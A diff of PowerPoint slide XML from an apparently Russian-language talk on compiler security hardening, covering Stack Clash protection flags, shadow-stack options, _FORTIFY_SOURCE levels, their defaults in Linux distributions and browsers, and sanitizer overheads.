-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA46AE-2AEA-42A0-B331-598916A3F385}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34154,48 +34006,24 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включен по умолчанию только в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang)</a:t>
+              <a:t>Несколько реализаций:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется явно указывать флаг </a:t>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>SafeStack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -34209,29 +34037,59 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-clash-protection</a:t>
-            </a:r>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=safe-stack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>наиболее распространённый флаг)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты в Debian</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> Fedora</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Intel CET Shadow Stack:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> не реализован (нельзя включить ни по</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -34239,144 +34097,78 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ubuntu собираются с этим флагом</a:t>
+              <a:t>ни по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>–</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>mshstk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>ShadowCallStack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=shadow-call-stack</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в дистрибутивах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clash</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Статус на </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>неясен (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>compiler-flags-distro #12</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
+              <a:t>Защита не включена по умолчанию в дистрибутивах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и браузерах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome/Firefox</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>На </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian 12 (stable) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не защищены даже уязвимые программы: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>bash, bzip2, curl, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ffmpeg</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>perl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, python, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует защиту от </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clash (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>BZ #1852202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>), </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>а </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
@@ -34388,7 +34180,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C614A2F-E5F3-45F9-86A4-52A24EAE633A}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8A2AE2-629B-42FD-9E28-E4A1D19A5BF3}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34415,7 +34207,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494840990"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796431697"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -34493,14 +34285,32 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening – </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>крайняя мера, лучше обнаруживать ошибки на этапе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>QA</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>AddressSanitizer</a:t>
             </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (≥ 2x)</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
@@ -34550,7 +34360,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL</a:t>
+              <a:t>STL (≥ 2x)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -34633,8 +34443,12 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>Valgrind</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (20-50x)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -34770,7 +34584,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFADEC6-171D-4ACB-9FCC-86BE492CE91F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34788,11 +34602,11 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>_FORTIFY_SOURCE: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
+              <a:t>Stack Clashing: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как использовать</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -34806,7 +34620,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C3255C-F753-4543-BECB-F71864F2D5F2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34817,277 +34631,235 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="838200" y="1834590"/>
-            <a:ext cx="10515600" cy="4351338"/>
-          </a:xfrm>
-        </p:spPr>
+        <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для явного включения используются макросы </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
+              <a:t>Включен по умолчанию только в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется явно указывать флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-clash-protection</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не появится </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-              </a:rPr>
-              <a:t></a:t>
+              <a:t>Пакеты в Debian</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ubuntu собираются с этим флагом</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в дистрибутивах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пакеты </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Clash</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Статус на </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>неясен (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>compiler-flags-distro #12</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по умолчанию в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включена в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> не включена по умолчанию нигде</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>с 2023</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>На </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian 12 (stable) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не защищены даже уязвимые программы: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>bash, bzip2, curl, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>ffmpeg</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>perl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, python, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует защиту от </a:t>
+            </a:r>
